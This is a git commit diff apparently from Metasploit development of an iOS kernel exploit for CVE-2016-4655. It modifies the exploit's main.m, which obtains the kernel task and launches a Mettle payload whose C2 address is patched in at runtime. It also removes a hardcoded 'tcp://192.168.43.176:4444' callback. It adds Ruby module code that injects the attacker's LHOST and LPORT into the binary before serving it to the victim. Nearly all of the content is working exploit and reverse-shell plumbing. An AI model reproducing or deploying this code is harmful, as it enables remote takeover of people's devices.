add binary
This commit is contained in:
Tim W
parent
df60c5bb6b
commit
2ec7f11b90
Binary file not shown.
|
|
@ -1,23 +1,5 @@
|
|||
/*
|
||||
* main.m - Helper file
|
||||
*
|
||||
* Copyright (c) 2017 Siguza & tihmstar
|
||||
*/
|
||||
|
||||
|
||||
#import <UIKit/UIKit.h>
|
||||
|
||||
//#include <errno.h>
|
||||
//#include <stdbool.h>
|
||||
//#include <stdio.h>
|
||||
//#include <string.h>
|
||||
//#include <unistd.h>
|
||||
//#include <spawn.h>
|
||||
//#include <sys/stat.h>
|
||||
//#include <mach/mach.h>
|
||||
|
||||
//#include <IOKit/IOKitLib.h>
|
||||
|
||||
#include "arch.h"
|
||||
#include "exploit64.h"
|
||||
#include "nvpatch.h"
|
||||
|
|
@ -49,69 +31,27 @@ void suspend_all_threads() {
|
|||
}
|
||||
}
|
||||
|
||||
/*
|
||||
extern char* const* environ;
|
||||
int easyPosixSpawn(NSURL *launchPath,NSArray *arguments){
|
||||
NSMutableArray *posixSpawnArguments=[arguments mutableCopy];
|
||||
[posixSpawnArguments insertObject:[launchPath lastPathComponent] atIndex:0];
|
||||
|
||||
int argc=(int)posixSpawnArguments.count+1;
|
||||
printf("Number of posix_spawn arguments: %d\n",argc);
|
||||
char **args=(char**)calloc(argc,sizeof(char *));
|
||||
|
||||
for (int i=0; i<posixSpawnArguments.count; i++)
|
||||
args[i]=(char *)[posixSpawnArguments[i]UTF8String];
|
||||
|
||||
printf("File exists at launch path: %d\n",[[NSFileManager defaultManager]fileExistsAtPath:launchPath.path]);
|
||||
printf("Executing %s: %s\n",launchPath.path.UTF8String,arguments.description.UTF8String);
|
||||
|
||||
posix_spawn_file_actions_t action;
|
||||
posix_spawn_file_actions_init(&action);
|
||||
|
||||
pid_t pid;
|
||||
int status;
|
||||
status = posix_spawn(&pid, launchPath.path.UTF8String, &action, NULL, args, environ);
|
||||
|
||||
if (status == 0) {
|
||||
if (waitpid(pid, &status, 0) != -1) {
|
||||
// wait
|
||||
}
|
||||
}
|
||||
|
||||
posix_spawn_file_actions_destroy(&action);
|
||||
|
||||
|
||||
return status;
|
||||
}
|
||||
*/
|
||||
const char payload_url[256] = "PAYLOAD_URL";
|
||||
|
||||
void start_mettle()
|
||||
{
|
||||
NSLog(@"start_mettle");
|
||||
struct mettle *m = mettle();
|
||||
if (m == NULL) {
|
||||
return;
|
||||
}
|
||||
|
||||
c2_add_transport_uri(mettle_get_c2(m), "tcp://192.168.43.176:4444");
|
||||
c2_add_transport_uri(mettle_get_c2(m), payload_url);
|
||||
|
||||
NSLog(@"mettle_start");
|
||||
mettle_start(m);
|
||||
|
||||
mettle_free(m);
|
||||
NSLog(@"mettle_done");
|
||||
}
|
||||
|
||||
int main(int argc, char * argv[]) {
|
||||
NSLog(@"hello from exploit");
|
||||
suspend_all_threads();
|
||||
NSLog(@"threads suspended");
|
||||
|
||||
//vm_address_t kbase = 0;
|
||||
//task_t kernel_task = get_kernel_task(&kbase);
|
||||
//LOG("kernel_task: 0x%x", kernel_task);
|
||||
vm_address_t kbase = 0;
|
||||
task_t kernel_task = get_kernel_task(&kbase);
|
||||
|
||||
NSLog(@"hello from uid %d", getuid());
|
||||
start_mettle();
|
||||
|
||||
return 0;
|
||||
|
|
|
|||
|
|
@ -5,5 +5,6 @@ rsync -azPr -e "ssh -p2222" --delete . localhost:rsync/cve/
|
|||
ssh -p2222 localhost "bash -l -c 'cd rsync/cve && make main_vm' && echo Done!"
|
||||
rsync -azPr -e "ssh -p2222" --delete localhost:rsync/cve/ .
|
||||
ls -l main_vm
|
||||
make install
|
||||
cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -58,6 +58,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
elsif request.uri =~ %r{/exploit$}
|
||||
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
|
||||
loader_data = File.read(local_file, {:mode => 'rb'})
|
||||
payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
|
||||
payload_url_index = loader_data.index('PAYLOAD_URL')
|
||||
loader_data[payload_url_index, payload_url.length] = payload_url
|
||||
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
|
||||
print_status("Sent exploit (#{loader_data.size} bytes)")
|
||||
return
|
||||
|
|
|
|||
Loading…
Reference in New Issue